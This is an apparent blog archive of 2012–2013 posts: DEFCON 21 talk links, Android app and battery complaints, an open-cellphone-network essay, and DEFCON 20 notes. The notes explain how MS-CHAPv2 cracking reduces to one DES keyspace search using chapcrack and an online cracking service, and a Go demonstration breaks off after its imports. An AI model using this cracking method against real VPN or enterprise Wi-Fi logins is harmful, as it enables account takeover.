- The slides for Nicolas Oberli’s presentation, “Please Insert Inject More Coins”, are here.
- Slides and code from the Todd Manning and Zach Lanier talk, “GoPro or GTFO: A Tale of Reversing an Embedded System”, are located here.
- The GitHub repository for gitDigger, from the Jaime Filson and Rob Fuller talk, “gitDigger: Creating useful wordlists from public GitHub repositories”, is here. I have not found slides from DEFCON 21 yet, but there’s a video of the talk from BSidesLV 2013 here.
- Slides from the Jaime Sanchez presentation on “Building an Android IDS on Network Level” are here.
- Melissa Elliott has uploaded the slides from her talk, “Noise Floor: Exploring the world of unintentional radio emissions” here. Thanks to the rtl-sdr.com blog for the heads-up.
Archive for the ‘Android’ Category
And even more DEFCON 21 links: August 9, 2013.
Friday, August 9th, 2013
DEFCON 21 update: August 5, 2013.
Monday, August 5th, 2013
Yeah, I know, I’ve been quiet. Much of Friday’s blogging time was eaten by Bluehost instability, and Saturday and Sunday were busy.
But I do have some updates and links.
- Slides for Benjamin Caudill’s “Offensive Forensics – CSI for Bad Guys” are here. See also his post on the Rhino Security Labs blog.
- Amber Baldet has a post up with links to the slides from her “Suicide Risk Assessment & Intervention Tactics” talk, and some additional resources. I’m not on Twitter, so I can’t add to the support she’s been getting there. But I will say, again: thank you, Amber, for doing this.
- Amir Etemadieh and the other Google TV hackers have a page up at the GTVHacker site with slides and resources from their DEFCON 21 presentation, “Google TV or: How I Learned to Stop Worrying and Exploit Secure Boot”. There is also a blog entry that (I think) gives a little more context to the slides.
- Dan Crowley, David Bryan, and Jennifer Savage have slides, a white paper, and sample code from their presentation at Black Hat, “Home Invasion 2.0 – Attacking Network-Controlled Consumer Devices”, up at the Black Hat site. From the descriptions, I assume that the DEFCON 21 version is very similar to the Black Hat one.
- Chris Valasek and Charlie Miller have a blog entry up at IOActive with links to the content and their white paper on “Adventures in Automotive Networks and Control Units”.
- The LMG Security blog has a post up with links to the white paper and source code from the Sherri Davidoff/Randi Price/David Harrison/Scott Fretheim talk, “Do-It-Yourself Cellular IDS”.
- Ryan W. Smith has a post up at the Lookout blog about the talk he did with Tim Strazzere, “DragonLady: An Investigation of SMS Fraud Operations in Russia”. That post, in turn, links to the white paper summarizing their presentation.
- I haven’t found the DEFCON slides for Joseph Paul Cohen’s “Blucat: Netcat For Bluetooth” presentation yet. But here’s the Blucat SourceForge page, which includes slides from a couple of other conferences, and the source code, and Mac OS X binaries for 10.6 and 10.8. Wow. I got more than what I asked for. (Edited to add 8/6: Mr. Cohen has added the DEFCON 21 slides. Praise be unto him, and may flights of angels sing him to sleep.)
- The slides for Aaron Bayles’ “Oil and Gas Infosec 101” talk are here.
I’m going to cut things off here for right now. I’m still trying to find links to some of the other presentations I mentioned (in particular, I’d love a link of some sort to Anch’s “Pentesters Toolkit” if anyone has one) and will post updates as they come in. Depending on what I dig up, there may be a second post tomorrow. In the meantime, this should keep you busy.
DEFCON 21: -1 day notes.
Wednesday, July 31st, 2013
Just because I’m not going to DEFCON 21 doesn’t mean I can’t try to cover it. From 1,500 miles away. Sort of half-assedly.
DEFCON hasn’t even started yet, but Black Hat is going on, and some stuff is coming out. The biggest story so far has been Barnaby Jack’s death. I haven’t mentioned it previously because I’ve felt like it was well covered elsewhere (even FARK).
Another “big” (well, I think it is) story that I haven’t seen very much coverage of is the phone cracking bot. Justin Engler (@justinengler on Twitter) and Paul Vines, according to the synopsis of their talk and the linked article, built a robot for under $200 that can brute force PINs. Like the one on your phone.
This is one I’ll be keeping an eye on.
Borepatch is in Vegas this year, attending both Black Hat and DEFCON. He’s got a couple of posts up: a liveblog of the NSA director’s presentation at Black Hat, and another post about the links between black hats and political candidates.
So the DEFCON schedule is up. If I was going, what would get me excited? (I’ve included the Twitter handles of the speakers from the DEFCON 21 schedule information; I figure this gives a central source for looking up someone’s feed and getting copies of their presentation.)
From Thursday’s talks: I’d probably go to “Hacker Law School”, as I’m a frustrated wanna-be lawyer anyway. Why not?
Anch’s (@boneheadsanon) “Pentesters Toolkit” talk makes my heart skip a beat:
Push some more of my buttons, please.
The Aaron Bayles (@AlxRogan) “Oil and Gas Infosec 101” talk kind of intrigues me, but it would depend on my mood at the time as to whether I went to that one, or skipped out for a break.
Likewise with the Beaker and Flipper talk on robot building: yeah, robot building is something I’m interested in doing, but I might just be in a mood to visit the Atomic Testing Museum instead, and read your slides later. Nothing personal: I’m sure it will be a great talk.
I’m intrigued by the ZeroChaos (@pentoo_linux) panel on the Pentoo LINUX distribution for penetration testing. I’m not sure how that differs from, say, BackTrack, but I’d probably show up just so I could find out.
The “Wireless Penetration Testing 101 & Wireless Contesting” talk by DaKahuna and Rick Mellendick (@rmellendick) hits yet another of my hot buttons. I can’t tell from the description how much of this is going to be describing contests in the Hacker Village, and how much will be practical advice, but I’d show up anyway.
That takes us into Friday. Just from a preliminary look at the schedule, it looks like the big thing this year is hacking femtocells. Doug DePerry (@dugdep) and Tom Ritter (@TomRitterVG) are doing a talk on “I Can Hear You Now: Traffic Interception and Remote Mobile Phone Cloning with a Compromised CDMA Femtocell”:
The Charlie Miller (@0xcharlie) and Chris Valasek (@nudehaberdasher) talk, “Adventures in Automotive Networks and Control Units”, sounds interesting as well. I’m just slightly more interested in femtocells than automotive hacking, so apologies to Mr. Miller and Mr. Valasek: if the two weren’t in conflict, I’d hit your talk for sure.
And if you haven’t been to a software defined radio talk, Balint Seeber’s (@spenchdotnet) sounds promising.
“The Secret Life of SIM Cards” by Karl Koscher (@supersat) and Eric Butler (@codebutler) intrigues me the most out of the 11:00 talks. And I’m kind of interested in the Ryan W. Smith (@ryanwsmith13) and Tim Strazzere “DragonLady: An Investigation of SMS Fraud Operations in Russia” presentation because, well…
There’s not much that intrigues me after Benjamin Caudill’s (@RhinoSecurity) presentation on “Offensive Forensics: CSI for the Bad Guy”. If I was at DEFCON, this is the time where I’d probably be browsing the dealer’s room, though I might go to the Amir Etemadieh (@Zenofex)/Mike Baker (@gtvhacker)/CJ Heres (@cj_000)/Hans Nielsen (@n0nst1ck) Google TV panel: these are the same folks who did the Google TV talk at DEFCON 20.
I feel kind of conflicted at 4:00. The Daniel Selifonov talk, “A Password is Not Enough: Why Disk Encryption is Broken and How We Might Fix It” sounds interesting. But I’m also intrigued by the “Decapping Chips the Easy Hard Way” with Adam Laurie and Zac Franken. Decapping chips is something I’ve been fascinated by, and it looks like Adam and Zac have found methods that don’t involve things like fuming nitric acid (and thus, are suitable for an apartment).
This is also the time when we, once again, present the “Hippie, please!” award to Richard Thieme for “The Government and UFOs: A Historical Analysis”.
I’m slightly intrigued by Nicolas Oberli’s (@Baldanos) talk about the ccTalk protocol, “Please Insert Inject More Coins”:
Saturday morning, we have the second femtocell talk, “Do-It-Yourself Cellular IDS”, by Sherri Davidoff (@sherridavidoff), Scott Fretheim, David Harrison, and Randi Price:
Opposite that, and worth noting, are the annual Tobias/Bluzmanis lock talk, and the David Lawrence et al talk on using 3D printers to defeat the Schlage Primus.
More than likely, I’d hit the Daniel Crowley et al (@dan_crowley) talk, “Home Invasion 2.0 – Attacking Network-Controlled Consumer Devices”, and the Philip Polstra (@ppolstra) presentation “We are Legion: Pentesting with an Army of Low-power Low-cost Devices”. I’m particularly intrigued by the Polstra talk, as one of my areas of interest is how small can we make devices that can still do useful hacking? What’s the smallest feasible wardriving system, for example?
I do want to give Jaime Sanchez (@segofensiva) a shout-out for his talk on “Building an Android IDS on Network Level”. This is worth watching.
I’d have to go to the Phorkus (@PeakSec)/Evilrob “Doing Bad Things to ‘Good’ Security Appliances” talk:
Because, tape! But the Wesley McGrew “Pwn The Pwn Plug: Analyzing and Counter-Attacking Attacker-Implanted Devices” talk also interests me.
The PIN cracking device talk is on Saturday, opposite Amber Baldet’s (@AmberBaldet) talk on “Suicide Risk Assessment and Intervention Tactics“. I’m glad DEFCON accepted her talk, and I am looking forward to seeing the presentation online.
Also noteworthy, I think: James Snodgrass and Josh Hoover (@wishbone1138) on “BYO-Disaster and Why Corporate Wireless Security Still Sucks”.
Todd Manning (@tmanning) and Zach Lanier (@quine) are doing a presentation on “GoPro or GTFO: A Tale of Reversing an Embedded System”. I don’t have a GoPro (yet) or much of a use for one (yet) but I think they are interesting devices, so I’ll be watching for slides from this talk. Same for the conflicting Melissa Elliott talk, “Noise Floor: Exploring the World of Unintentional Radio Emissions”.
This takes us to Sunday. There’s not a whole lot that really turns me on early, though I admit to some interest in the Jaime Filson/Rob Fuller talk on harvesting github to build word lists:
I like the idea behind John Ortiz’s “Fast Forensics Using Simple Statistics and Cool Tools”, and he teaches at the University of Texas – San Antonio, so I’d probably go to that.
Now is when things start heating up from my perspective. Joseph Paul Cohen is giving a talk on his new tool, “Blucat: Netcat For Bluetooth”:
Holy crap, this sounds awesome. All I ask for is code that compiles.
(Unfortunately, this is up against the Eric Robi (@ericrobi)/Michael Perklin talk on “Forensic Fails”, which sounds like fun. But Bluetooth hacking is a big area of interest for me; sorry, guys.)
Speaking of Bluetooth hacking, Ryan Holeman (@hackgnar) is doing a talk on “The Bluetooth Device Database”. Which is exactly what it sounds like:
Dude lives in Austin, too! Holy crap^2!
And that takes us through to the closing ceremonies and the end of DEFCON 21. I will try to link to presentations as they go up, significant news stories, other people’s blogs, and anything else I think you guys might be interested in. If you have specific requests or tips, please either let me know in comments or by email to stainles at mac dot com, stainles at gmail dot com, or stainles at sportsfirings dot com.
I went back to Ohio, but my city was gone.
Monday, July 15th, 2013
Well, not really “gone”. I hadn’t been back to Ohio for nine years, and it amazed me somewhat both how much and how little has changed.
For example, there’s an entire grocery chain that I don’t remember from my last trip…that takes the Discover card and cash. No Visa/AmEx/MasterCard/Diner’s Club, not even debit cards with a PIN, just cash and Discover. Who came up with this idea?
On the other hand, the tractor tire store that was a landmark on the way to Grandma’s place is still there, after 40 something years. And Grandma’s place still feels remote from everything, even though there’s major strip centers at the end of her road, and even though much of the land was sold off over the past few years (and now has houses sitting on it).
And the old NASA hangar is still visible from the airport. That was another landmark for us kids. (My dad worked there, back when it was still the Lewis Research Center, before it was renamed “NASA John H. Glenn Research Center at Lewis Field”. Which is a mouthful. Not that I’m bitter or anything over the renaming; by gosh, if anyone deserved to have a NASA facility named after him, it was John Glenn.)
This is shaping up to be a long post, and sort of “stream of consciousness”, so I’m going to put the rest of it behind a jump. Before I do, here’s Grandma’s obituary, just for the record.
Here in my car, I can’t make a call, because the system doesn’t work at all…
Saturday, June 29th, 2013
More:
Why do you need cars signaling that their windshield wipers are on to warn of a rainstorm ahead? I have a close friend who recently bought a 2013 Ford: it has weather information integrated into the navigation system. As I recall, his 2011 Ford had the same feature.
But my primary reason for blogging this is so I can link to episode 11 of the Neutral podcast, in which John Siracusa, Marco Arment, and Casey Liss discuss why car software stinks. I think all of the Neutral podcasts are worth listening to, but if you’re only going to listen to one, this is the one I’d recommend.
Another question for the huddled masses.
Friday, May 17th, 2013
Why do Android podcast clients suck?
I’ve written previously about my experience with the awful Pocket Casts application.
I dumped that and started using Google Listen. Google Listen frequently fails to completely download all of a podcast (so you end up with one in the queue that’s cut short, without any warning), frequently hangs up when trying to add a new podcast, and is no longer supported or maintained by Google. (Edited to add: Also, my phone frequently reboots while Google Listen is running, but I’m not sure if that is a Google Listen problem or a problem with some other application.)
I downloaded BeyondPod for my Kindle Fire. The free version (which I am using) has some limitations: you can’t set up automatic updates to your podcast feeds, nor can you download more than one podcast at a time. In order to activate those features, you have to pay $6.99 for an unlock code. Personally, I think that’s a bit steep for a podcast client, but if BeyondPod actually did what I wanted it to do, I’d pay that.
However, BeyondPod has a couple of what I consider to be crippling issues:
- I find the user interface to be completely counter-intuitive. For example, if I have a podcast on my playlist, playing, and I want to switch to the player controls (to rewind, pause, or fast forward) I can’t figure out how to do that. Sometimes BeyondPod will display player controls underneath the playlist, other times it doesn’t. Sometimes you can swipe up and see the controls for the specific podcast; sometimes you can’t. There seems to me to be no rhyme or reason to what controls BeyondPod displays when and where, and how to get from one set of controls to another.
- Then there’s my personal favorite BeyondPod “feature”. If you have a playlist, and you’re looking at the feeds for a podcast (say, you want to read the notes on a specific podcast), and you accidentally touch in the wrong place, BeyondPod starts playing the podcast you’re looking at. This makes sense. What doesn’t make sense is that BeyondPod also wipes out your existing playlist. Oh, you wanted to listen just to that podcast, or you missed the touch target and didn’t intend to play that podcast at all? Too bad, so sad, rebuild your playlist. That’s a deal breaker for me; no, I will not pay you $7 for a podcast client that erases my playlists.
All I want out of a podcast client is a few basic, simple things:
- Maintain a feed of the podcasts I want to listen to.
- Reliably download those podcasts. If a podcast fails to completely download, either warn me or retry until it does.
- Let me mark podcasts as listened or not listened.
- Let me fast forward/rewind within the currently playing podcast.
- Let me have a playlist of podcasts that I can easily rearrange.
That’s pretty much it. There are some other features that would be nice (ability to sync across multiple platforms, for example) but not essential to me. So why is this so hard?
Android fans constantly bash Apple and iTunes. Yes, iTunes has problems, most of which involve trying to put too many functions into one piece of software. But for all the problems iTunes has, it is at least capable of doing all of the things on my minimum list. I can’t say that for any Android client I’ve tried so far.
Ring ring ring, open phone.
Monday, April 29th, 2013
Great and good friend of sportsfirings.com and valued commenter lelnet left a long comment on last night’s cellphone post. Because his comment represents a lot of work and thought (and I believe in rewarding hard work) and because I’m afraid it will get lost in the shuffle, I’m promoting it to a blog post (with his permission).
You can already buy, off the shelf at Fry’s, a “phone” that does essentially what you’re talking about, using available wi-fi networks to connect with Skype and make calls through that, without any involvement of the cell providers. (Yes, I know…Skype is a proprietary protocol and would be unacceptable to Stallman. The firmware is also closed. But since it’s provably _possible_, one could do it with open standards if one saw a market.)
The problem is that it doesn’t scale well. Getting a reliable wi-fi signal is pretty easy…in the sorts of places one is likely to have access to a _wired_ phone whenever one wants one. Building a wi-fi network that covers the places one actually needs mobile connectivity from is a massively harder problem, due to the range limitations of unlicensed spectrum.
It _might_ be possible to do it using amateur frequencies, _if_ you could get regulatory approval to open those up to use by the general public. Which, of course, would involve fighting off both the whole telco industry and at least 80% of the amateur radio community. Considering that the latter group is where you’d be trying to recruit most of your network engineers from, it seems like it’d be a bad idea to begin your plan by irrevocably pissing them off, even if you magically assume that you’ll be able to out-muscle the telcos in Washington.
The last mile is a hard problem on several different dimensions, some of them physical and some of them political. But there is something you _could_ do…
Build an Android (or, if you like, Replicant) phone, pre-configured to send all its traffic through an encrypted VPN to an anonymizing end-point. Purchase connectivity for it on an existing cell carrier’s prepaid plan. Disable the cellular voice service, and have it send and receive calls exclusively through VoIP connectivity to an Asterisk or FreeSwitch server, either run by the same entity that does your anonymizer, or run yourself on a cheap colo server stuck in a rack in some country you doubt is ever going to care enough to spy on you.
Your cell provider can easily determine that Charles Udall Farley (or whatever name you gave them when you signed up…it’s prepaid, so it’s not like the name you give has to pass a credit check) pushes a lot of data around, but they’d have no way of inspecting the content. They’d have a record of Mr. Farley’s movements around their network, but no way to associate that with you, or even with the phone number you make and receive calls on. An Open Source OS on the phone addresses the “remote bugging” fears. It doesn’t depend on you personally running any software that RMS would find objectionable. And since you can make and receive calls from anywhere that you’re able to get a data signal off a cell tower, it’s still useful if your car breaks down by the side of the road, instead of just in your home and office, like a wi-fi-only device would be.
(I came up with this plan for a team of spies in a novel my wife is writing. But although to my knowledge no such phone exists today, there’s absolutely no barrier to someone building one tomorrow. And both the technologies and the services required to support the back-end of it are already available for purchase in the real world right now, at prices comparable to or better than what people who already had cell phones in the mid-90s were paying for service then.)
The only thing I’d add to this is that I, personally, have no interest in pissing off the amateur radio operators out there; both because it is not good strategy, as lelnet notes, and because I happen to be one myself. (KF5BFL, in case anyone was wondering, but don’t look for me; I don’t have any transmitting equipment at the moment.)
We’ve got computers, we’re tapping phone lines, I know that ain’t allowed…
Sunday, April 28th, 2013
Two things collided in my head last week. After I picked up the wreckage, I thought there might be a worthy blog post in the aftermath.
(Picking up the wreckage took a while, because the week was so busy. At least nobody took part of a locomotive through the eye. Anyway, I apologize if this is old news.)
Thing one: Andrew Huang’s post on the $12 Gongkai phone (by way of LWN). It doesn’t come as any great shock to me that cellphone hardware has become cheap: at last year’s DEFCON, the Ninja Networks party invitations were fully functional cellphones. (I do not know what the Ninja Networks cost per phone was: as I recall, the Ninjas stated they got substantial financial and technical support from Qualcomm. However, the fact that the phones were cheap enough to pass out as party invites is significant in and of itself, in my ever so humble opinion.)
Thing two: Dr. Richard Stallman and his position on cell phones. I don’t want to reopen the whole debate on whether Stallman is a hypocrite for not having a cell phone but being willing to use other people’s phones. Rather, I want to ask a not-so-simple simple question: is it possible to build a phone that overcomes Stallman’s objections?
Well, it looks like we can put together a cellphone computer for about $12. Maybe less. I don’t see any reason to think that someone (more likely, a small group of someones) couldn’t put together a reference hardware spec for an open cellphone, complete with schematics, PCB layouts, and a parts list. I know I don’t have the skills or equipment to do SMD soldering, and I wouldn’t ask, say, my mother to build a phone from a kit either. But it is just as easy for me to visualize a scenario where some organization (say, the FSF) contracts with a manufacturer to build phones from the reference design, with an organizational seal of approval. They could sell the phones outright, or offer them as a premium for donations: I think I’d give at least $50 to FSF for a phone like the one Huang describes. Add WiFi, GPS, a color screen and a camera and I’d go up to $100, possibly more depending on my mood, the phase of the moon, and other factors.
But we need an operating system for our cellphone computer, right? Right. Android is open source. Note well, however, that there is a difference between “free software” and “open source software”, and that these are not equivalent concepts. But it seems pretty easy to imagine (as long as we are imagining) a fork of Android that is truly “free” by the FSF definition. As a matter of fact, we don’t even have to imagine; while I was researching this post, I stumbled across Replicant, which is exactly that.
I’ll deal with the second objection first. With a truly open source and free OS, I think you can pretty much eliminate the capacity for remote bugging. As to the first objection, I don’t see a way around that. It seems pretty clear that the phone system has to know where your phone is for you to make calls and get calls. But: if the system only stores that information for the minimum necessary length of time, and discards it after the call is completed, is that good enough for Stallman?
(Even if you’re not actively engaged in a call, I think the network still has to know what cell you’re in. But could the network only store your current cell, and not the history of cells you’ve been through?)
(From this point forward, I’m going to refer to this idea as the “open” network. Calling it the “free” network carries with it the connotation that people aren’t paying for it. I’ll come back to that.)
Okay. So we expect AT&T and Sprint and Verizon and T-Mobile and the Grace L. Ferguson Cell Phone and Storm Door Company not to store this information. Right. I’ll wait for you to finish laughing.
Done? Okay. So we not only need consumer hardware, we need an entire “open” cell phone network. Is that something that could be reasonably built? Well, we need radio spectrum. It is unlikely that the carriers will give up spectrum for an “open” network. So what do we do? Could we use amateur radio frequencies, like the 2390-2450 MHz band? Is it even possible that local amateur radio groups could set up and maintain cells in their local areas? (I don’t imagine the equipment to set up a cell is cheap, but I also don’t imagine it is beyond the reach of a group of talented amateur radio operators with a GNU software radio. And if the equipment becomes widespread, the prices should go down. I hope.)
Could you even do away completely with the cell network, and just run all the communications over IP? You’d need to be associated with an access point, but aren’t most folks near one at home or at work most of the day? Would it be possible for amateur radio operators to set up networks of access points along major urban corridors? WiFi hardware is even more of a commodity item than cell hardware, and there are protocols for linking access points together or doing mesh networks.
Someone has to pay for this, right? Right. We don’t want movements and activity tracked, but I don’t see any philosophical problem with a simple lookup based on each phone’s unique identifier. All you need is one bit to indicate the customer is paid up and entitled to use the network. As for the actual cost and billing, it seems to me that can be handled by systems outside the network. If you’re giving unlimited everything for one flat fee, you don’t need to track anything except paid or unpaid. If you want to start getting into per voice minute or per KB data charges, it seems to me that you can still track usage (minutes, KB, or texts) without tracking activity and bill based on usage. The money from service fees could, in turn, be routed to the cell providers. I’m sure we could come up with a fair way of doing this; for example, X cents per call routed through an individual cell. Busier cells get more money, which they can invest in upgrading service; more remote cells probably have lower demand, and don’t need the same capacity.
(One big problem if you’re using amateur radio frequencies: FCC regulations prohibit “communications in which the operator has a pecuniary interest, including communications on behalf of an employer”. There’s a strong tradition, in addition to the FCC regulations, against using the amateur radio bands for business purposes. One could argue that this kind of network wouldn’t be a business, though; rather, it would be maintained as a public service, and the money that comes in would go back out to local amateur organizations to cover their cost of maintaining cells. I sort of see this in the same way as I do the repeaters maintained by some amateur radio clubs for the use of their members.)
So I said this was a not-so-simple simple question. Basically, what I don’t know about cell phones and cell technology could fill books. (Indeed, it has filled books, which are located in places called “bookstores” and “libraries”. But I digress.) I think I’ve outlined a possible path to an “open” network, but I acknowledge the limits of what I know. I would welcome criticism from people who know more than I do: those who work in the industry, computer security experts, and heck, even cyberpunk writers.
I mention cyberpunk writers for a reason. Maybe I am over-romanticizing this a bit, but I have this mental image of guys in the Sprawl with “open” cellphones spread out on blankets in the street, and gangs like the Panther Moderns using those phones. A guy can dream, can’t he?
(Subject line hattip: the greatest rock song ever, by the greatest band ever. Like you needed it anyway.)
Edited to add: I knew there was something I was forgetting. How reliable would this network be? After all, AT&T spends hundreds of millions of dollars a year on their network, where what I’m talking about here is something that is, at best, a fringe network primarily used by people highly concerned with privacy, and possibly maintained by amateurs on a spare time basis. On the other hand, AT&T spends hundreds of millions of dollars a year on their network. Enough said.
My inclination is to say that you could probably build something that’s “good enough”. You might not be able to get to the same level of service as, say, Verizon, but you could probably get to a level of service where people are willing to make the tradeoff between guaranteed privacy and a small amount of inconvenience. I think this is one place where my plan is weak.
Edited to add 2: 1500 words? I haven’t written like this since I was in college. In other words, last year.
Night thoughts.
Saturday, March 23rd, 2013
Some folks may have noticed that I haven’t been doing as much bread blogging recently. That’s because I haven’t been baking as much bread; I’ve been a little tied up with some family things. Nothing serious, nothing health related, and things are winding down. But it has distracted me a little from the bread machine. I’m going to try to do another one of Laurence Simon’s recipes this week, but I’m not sure which one.
In other news, I’m trying to get back on my bike. I have a Trek 7500 that I bought several years ago, and which sat idle pretty much the entire time I was going to St. Ed’s. I took it in last week and had it cleaned, lubed, and tuned; now I just have a series of petty annoyances I’m working my way through. (I couldn’t find my water bottles, so I bought replacements. You can’t have too many water bottles, anyway. Then I couldn’t find my bike shoes: I can ride the Trek in my normal sort of half-boot half-sneaker shoes, but it isn’t as efficient. REI had some Shimano SH-MT33L shoes on the clearance rack at an incredibly low price, so I grabbed a pair of those.)
(Side note: I bought my bike at Freewheeling Bicycles. Why? Lawrence bought his there. I’m happy I followed his lead. The total bill to get my bike out of hock last week was about $104. That price included $8 for a rear tube, and another $45 for a rear bike rack. I want to start making grocery store trips on the bike, rather than the car, so I bought the rack and plan to sling some panniers over it at some point. Since I bought the bike there, Freewheeling gave me a 25% discount on labor, so the whole thing ended up being much more reasonable than I expected. Consider this an endorsement of Freewheeling.)
(Side note 2: F–k Sun and Ski Sports, the horse they rode in on, and any horse that looks anything like the horse they rode in on.)
As a geek, one of the things I’ve always wanted to when I was riding was to log and track my rides. I have a cheap-ass bike computer with basic functionality: current and average speed, distance on current ride, odometer, and clock. But I’ve always wanted to be able to overlay my ride log onto a map and see where I’ve ridden, as well as getting elevation data. My feeling is that being able to do that gives me a tangible sense of progress, which gives me more motivation to ride. But those capabilities require GPS.
I’m still looking for work so I can’t (and don’t want to) spend $330 on a Garmin Edge 510 or $479 on a Garmin Edge 810. (“Social network sharing”?) If Garmin, or one of my readers sent me one, I’d certainly use it, but I don’t want anyone to do that (even as a birthday present). That kind of money will buy you a decent to nice Smith & Wesson, depending on what part of the country you’re in and what you’re looking at.
Here’s the thing: I’m smart. S-M-R-T. Smart. And not only am I smart, but! I have a smartphone! That has a GPS built in! And that runs apps! And, yes, there are cycling apps available! The big ones on Android seem to be MapMyRide and Strava, but I’ve also seen people say that MyTracks works quite well for cycling applications. And I already have MyTracks installed. And I already take my cellphone with me when I ride anyway, in case of emergency. Now all I have to do is get it properly rigged and I should have almost everything I need. (The last remaining piece is some cycling shorts with pockets. I’ve blown out the waistband on the one pair I have; whenever I put them on, they slide off my ass. This is not good for cycling purposes, or for staying off the sex offender registry purposes.)
(I got into a discussion with a friend of mine about Android/iPhone cycling apps. My friend’s position is that the dedicated cycling computers like the Garmin Edge line are preferable to using your phone for this purpose. His feeling is that running the GPS on the phone and logging data eats battery power, and your phone may run out of juice before you finish the ride. My feeling is: I’m not a high-speed low-drag road biker. I’m usually not out for more than an hour or two. If I start out with a fully charged battery, I feel like I should be able to run MyTracks for at least two hours without worry. We’ll test this theory once I get everything rigged for silent running. If I was doing the kind of thing he talks about doing, such as riding the Great Divide Mountain Bike Route 12 hours a day for ten weeks, I’d reconsider my position.)
Thinking about this some more, I wonder what the market for higher-end bike and running computers like the Garmins is today. Let’s see: I can pay $330 for the Edge 500. Or I can pay $196 for a HTC EVO V 4G Android phone pre-paid (no contract) from Virgin Mobile, get one of those cycling apps, and have two cameras and cell phone service. Or I could buy a cheap-ass used phone with no carrier off of eBay, run the same apps, do everything using WiFi, and not have to worry about breaking my good phone. All cell phones sold in the US are required to connect you with 911 even if you don’t have a service contract, so you’re covered in the event of a real emergency. And if you have a good cell phone you want to take riding with you, mounting brackets are a dime a dozen. Plus, I understand some newer Android phones support ANT+, so you can get cadence sensors and heart-rate monitors that will work directly with Strava or MapMyRide on your phone. No dedicated computer needed, so, again, what’s the market for that $479 Garmin Edge 810? (You can probably even do “social network sharing” from the phone, if that’s your cup of Gatorade.) Yes, you have to purchase the cadence sensor and heart rate monitor separately, but you also have to purchase those separately with the Edge 810: that $479 price does not include either sensor. If you have an iPhone, ANT+ isn’t directly supported, but Garmin will happily sell you an ANT+ adapter for a mere $50, or $40.73 from Amazon.
If any of my readers have experience with cycling apps like the ones I’ve mentioned (or others: I’m still running an Android phone, but iPhone users are welcome too) please feel free to leave a comment, or drop me an email if you’d prefer. Contact information is in the place where it says “Contact”.
To hell with Best Buy.
Sunday, January 6th, 2013
Battery life on my Android phone has always been an issue.
Not too long ago (I think slightly more than a year) I bought a 1750 mAh hour battery from Best Buy. That worked okay for a while, but over the past few days, it has become clear that battery is dying.
“No problem,” I thought. “I’ll get another one from Best Buy.”
Went to Best Buy. Looked for batteries. Couldn’t find any. Got a clerk’s attention.
Best Buy no longer carries any cell phone batteries. At all. They’ve got car chargers. They’ve got cases out the wazoo. But no batteries for any cell phones, even the ones they currently sell.
The clerk told me “go to Batteries Plus”.
(Batteries Plus wanted $43 for a standard capacity Evo 4G battery, and didn’t have any 1750 mAh batteries. Screw that. I can get two 2000 mAh batteries from Newegg for $11.29. And I still have my original Evo 4G battery, plus a 3500 mAh battery that I paid $4.99 for a while back. I haven’t been using the 3500 mAh one because it is a physically larger battery that requires putting a custom back on the phone (included with the original purchase), which would in turn require removing the case I have on the phone. But it is there if I need it while I wait for the Newegg ones to come in.)
(Yes, I know it was CompUSA, not Best Buy, but this is still obligatory.)
The map is not the territory.
Monday, October 1st, 2012
I was going to the destination for Saturday’s Saturday Dining Conspiracy. So, of course, I put the address into the new IOS6 mapping application on my shiny new iPhone 5.
The phone routed me to a shopping center across a major highway and, I’d estimate, about .3 miles from where the restaurant actually was.
Oh, wait. Did I say “IOS6 maps” and “shiny new iPhone 5”? I’m sorry. I meant to say “Google Navigation” and “my two-year-old HTC EVO running Android”.
Point being: Apple’s new Maps may not be up-to-spec, but I’ve personally run into problems with Google Maps/Google Navigation on my phone as well. Apple gets all the attention now, probably because new! shiny! but the claimed perfection of Google does not exist.
(As I said above, I use an HTC Evo on Sprint. Now that I’m off contract, I am considering an iPhone 5, mostly because I’m not totally happy with Android as an environment and as an ecosystem, as well as not very much liking the Sprint add-ons. As I’ve said elsewhere before, I work professionally with Windows and UNIX based operating systems, my main home computers are Macs, and my laptop is a netbook running Ubuntu. I don’t have a dog in the platform wars, and I don’t really give a damn what you use, or what you think of other people who use a different platform.)
I am disgusted.
Thursday, August 2nd, 2012
It is 3:00 PM local time on Ice Cream Sandwich Day, and nobody has brought me my Android 4.0 tablet yet.
DEFCON 20 notes: day 2.
Sunday, July 29th, 2012
Note: I’ve updated the day 1 notes with a couple of things I forgot to include last night.
“Defeating PPTP VPNs and WPA2 Enterprise with MS-CHAPv2”: MS-CHAPv2 is a wildly popular authentication protocol. For example, DEFCON’s “secure” network uses MS-CHAPv2. People have been attacking CHAP for a while now, but most of the attacks are dictionary attacks, where you use asleap and throw a word list at it, hoping the user picked a weak password.
So is MS-CHAPv2 security password dependent? That’s a reasonable assumption, but not true.
If you look at the details of the MS-CHAPv2 handshake (Moxie had a good visualization, which I can’t find online or I’d link to it here) there’s only one unknown: the MD4 hash of the user’s password. Everything else is sent in the clear, or can be derived from known information.
MS-CHAPv2 pads that 16-byte hash out to 21 bytes, splits it into three 7-byte DES keys, and encrypts the same 8-byte challenge under each to produce the 24-byte response. But it isn’t 3DES: it is three independent single-DES encryptions. The third key is only two bytes of hash followed by five bytes of zero padding, so it falls to a 2 to the 16th power search. The other two encryptions share the same plaintext, so one pass through the 56-bit keyspace, checking each candidate against both ciphertexts, recovers both keys; the end result is that cracking MS-CHAPv2 reduces to about the same as a single normal 56-bit DES key search, 2 to the 56th power.
Enter the folks at Pico Computing, about whom I have written before. Pico built a machine with 48 FPGA chips, each with 40 cores running at 450 MHz, to attack DES. This machine can search the whole keyspace in about 23 hours. And Pico has come up with some clever optimizations for the FPGAs: preconfiguring memory, reducing the bus down to “key found/key not found” (since searching the keyspace is linear, if you know when the bus went to “key found”, you can figure out what the key is), and possibly just using JTAG instead of a bus.
“So what,” you say. “I don’t have a single FPGA, let alone 48 of them.”
Enter chapcrack. Do a packet capture, point chapcrack at it, and chapcrack will pull out the MS-CHAP handshake, in a handy form which you can submit to…
…CloudCracker.com, which now supports MS-CHAPv2 attacks. Estimated turn-around time is one day. Woo hoo woo hoo hoo.
(Edited to add: Added a link to a blog post by Moxie Marlinspike summarizing his and David Hulton’s (of Pico Computing) presentation 8/1/2012.)
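The handshake structure Moxie described, worked through in Go as an added example (my code, not anything from the talk or from chapcrack): RFC 2759’s ChallengeHash and ChallengeResponse, followed by the two places the 56-bit reduction comes from. The challenges, username and NT hash are constructed values, not captured traffic. The full 2^56 search obviously cannot run on a laptop, so searchBothKeys takes explicit key windows; the usage below passes tiny windows around the true keys purely to exercise the single-pass loop, while the 2^16 search for the third key runs in full.

```go
package main

import (
	"crypto/des"
	"crypto/sha1"
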